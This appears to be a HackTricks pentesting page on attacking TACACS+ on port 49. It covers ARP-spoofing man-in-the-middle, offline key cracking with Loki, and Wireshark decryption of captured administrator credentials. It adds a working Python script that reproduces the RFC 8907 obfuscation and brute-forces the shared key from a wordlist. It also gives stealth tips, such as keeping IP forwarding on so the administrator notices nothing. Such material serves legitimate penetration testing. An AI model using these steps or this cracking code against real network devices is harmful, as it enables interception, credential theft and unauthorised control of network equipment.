49 - Pentesting TACACS+
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
Terminal Access Controller Access Control System (TACACS) is a security protocol that provides centralized validation of users who are attempting to gain access to a router or NAS. TACACS+ (RFC 8907), the more recent Cisco-designed successor to the original TACACS protocol, provides separate authentication, authorization and accounting (AAA) services, runs over TCP port 49, and protects packet bodies only with a shared secret that the network device and the TACACS+ server both know.
PORT STATE SERVICE
49/tcp open tacacs
Default port: 49
Intercept Authentication Key
If an attacker manages to get between the client (the router or NAS) and the TACACS+ server, they can capture the TACACS+ exchange. The shared key itself is never sent on the wire: each packet body is XORed with an MD5 keystream derived from the session ID, the key, the protocol version and the sequence number, so a captured packet can be bruteforced offline against a wordlist. Nothing is sent to the server, so the attempts do not show up in its logs. If the key is recovered, you can decrypt the traffic in Wireshark, read the administrator's credentials, and access the network equipment with them.
MitM
In order to perform a MitM attack you could use an ARP spoofing attack between the network device and the TACACS+ server. Remember to enable IP forwarding on the attacking host, otherwise the spoofed TCP/49 connection is dropped and the administrator notices the login failing.
Brute-force Key
Now you need to run Loki, a tool designed to analyze the security of L2/L3 protocols; its capabilities are comparable to those of the popular Yersinia and it is a serious competitor to it. Loki can also bruteforce TACACS+ keys: because the body is only XORed with an MD5-derived keystream, each candidate key can be tested offline against the captured packets. If the key is successfully bruteforced, we can access the equipment and decrypt the TACACS+ traffic.
sudo loki_gtk.py
You also need to specify the path to the dictionary in order to bruteforce the key. Be sure to uncheck the Use Bruteforce option, otherwise Loki will try every combination instead of the dictionary.
Now we have to wait for an administrator to log into the device through the TACACS+ server. It is assumed that the network administrator has already logged in and that we, standing in the middle via ARP spoofing, intercepted the traffic; the legitimate hosts do not notice that someone else has interfered with their connection.
Now click the CRACK button and wait for Loki to recover the key.
Decrypt Traffic
Great, we managed to recover the key, now we need to decrypt the TACACS+ traffic. As said above, Wireshark can decrypt TACACS+ traffic if the key is present: set it in Preferences > Protocols > TACACS+ > TACACS+ Encryption Key (or pass -o tacplus.key:<key> to tshark).
With the key configured, Wireshark shows the decrypted bodies: the login banner the device presented, the username of the user (admin) and the password the administrator typed.
As a result, we have the admin:secret1234 credentials, which can be used to access the hardware itself. Check their validity by logging in to the device before relying on them.
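What Loki and Wireshark do under the hood, as an added example that is not part of the original page or of either tool: the script below implements the TACACS+ body obfuscation from RFC 8907 (an MD5 chain keyed by session ID, shared key, version and sequence number, XORed over the body), builds a constructed PAP authentication START packet for the admin:secret1234 login, and then recovers the shared key by trying a wordlist and keeping the candidate whose decrypted body parses as a sane START. The wordlist, the key cisco123, the session ID and the port/remote-address fields are assumptions made up for the example; the plausibility checks are my own heuristic, not Loki's code.

```python
import hashlib
import struct

# TACACS+ header (RFC 8907 section 4.1): version, type, seq_no, flags, session_id, length
HEADER = struct.Struct("!BBBBII")
TAC_PLUS_AUTHEN = 0x01
TAC_PLUS_UNENCRYPTED_FLAG = 0x01
# Authentication START body (section 5.1): action, priv_lvl, authen_type,
# authen_service, user_len, port_len, rem_addr_len, data_len, then the variable fields
START_FIXED = struct.Struct("!BBBBBBBB")
TAC_PLUS_AUTHEN_LOGIN = 0x01
TAC_PLUS_AUTHEN_TYPE_PAP = 0x02   # for PAP the data field carries the password
TAC_PLUS_AUTHEN_SVC_LOGIN = 0x01


def pseudo_pad(session_id: bytes, key: bytes, version: bytes, seq_no: bytes, length: int) -> bytes:
    """RFC 8907 section 4.5: MD5_1 = MD5(session_id, key, version, seq_no),
    MD5_n = MD5(session_id, key, version, seq_no, MD5_n-1); concatenate and truncate."""
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(session_id + key + version + seq_no + prev).digest()
        pad += prev
    return pad[:length]


def obfuscate(header: bytes, body: bytes, key: bytes) -> bytes:
    """XOR the body with the pseudo-pad. XOR is its own inverse, so this also decrypts."""
    version, _ptype, seq_no, _flags, session_id, _length = HEADER.unpack(header)
    pad = pseudo_pad(struct.pack("!I", session_id), key, bytes([version]), bytes([seq_no]), len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def build_authen_start(session_id: int, key: bytes, user: bytes, password: bytes,
                       port: bytes = b"tty0", rem_addr: bytes = b"10.0.0.5") -> bytes:
    """Constructed PAP authentication START (seq_no 1), as the NAS would send it."""
    body = START_FIXED.pack(TAC_PLUS_AUTHEN_LOGIN, 1, TAC_PLUS_AUTHEN_TYPE_PAP, TAC_PLUS_AUTHEN_SVC_LOGIN,
                            len(user), len(port), len(rem_addr), len(password))
    body += user + port + rem_addr + password
    header = HEADER.pack(0xC0, TAC_PLUS_AUTHEN, 1, 0, session_id, len(body))   # version 0xc.0
    return header + obfuscate(header, body, key)


def parse_start(body: bytes):
    """Return (user, data) if the plaintext looks like a valid START, else None.
    A wrong key yields random bytes, which almost never pass these field checks."""
    if len(body) < START_FIXED.size:
        return None
    action, priv_lvl, authen_type, service, ulen, plen, rlen, dlen = START_FIXED.unpack_from(body)
    if action not in (1, 2, 3) or priv_lvl > 15 or not 1 <= authen_type <= 6 or service > 9:
        return None
    if START_FIXED.size + ulen + plen + rlen + dlen != len(body):
        return None
    off = START_FIXED.size
    user = body[off:off + ulen]
    off += ulen + plen + rlen               # skip port and rem_addr
    return user, body[off:off + dlen]


def crack_key(packet: bytes, wordlist):
    """Offline dictionary attack: decrypt the captured START with each candidate key."""
    header, body = packet[:HEADER.size], packet[HEADER.size:]
    _v, ptype, seq_no, flags, _sid, _length = HEADER.unpack(header)
    if ptype != TAC_PLUS_AUTHEN or seq_no != 1 or flags & TAC_PLUS_UNENCRYPTED_FLAG:
        raise ValueError("need an obfuscated authentication START (seq_no 1)")
    for candidate in wordlist:
        if parse_start(obfuscate(header, body, candidate)) is not None:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed capture: the administrator logs in while we sit in the middle.
    captured = build_authen_start(0x1234ABCD, b"cisco123", b"admin", b"secret1234")
    key = crack_key(captured, [b"password", b"tacacs", b"cisco", b"cisco123", b"Cisco!23"])
    print("key:", key)
    if key:
        user, password = parse_start(obfuscate(captured[:HEADER.size], captured[HEADER.size:], key))
        print("credentials:", user.decode(), password.decode())
```

Only the START of a PAP login carries both the username and the password in one body; for an ASCII login the password travels in the CONTINUE packet (seq_no 3), so a real capture needs the CONTINUE body decrypted with the same key and the same session ID as well.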
This is how you can attack TACACS+ and gain access to the control panel of network equipment.
References
- The Intercept Authentication Key section was adapted from https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9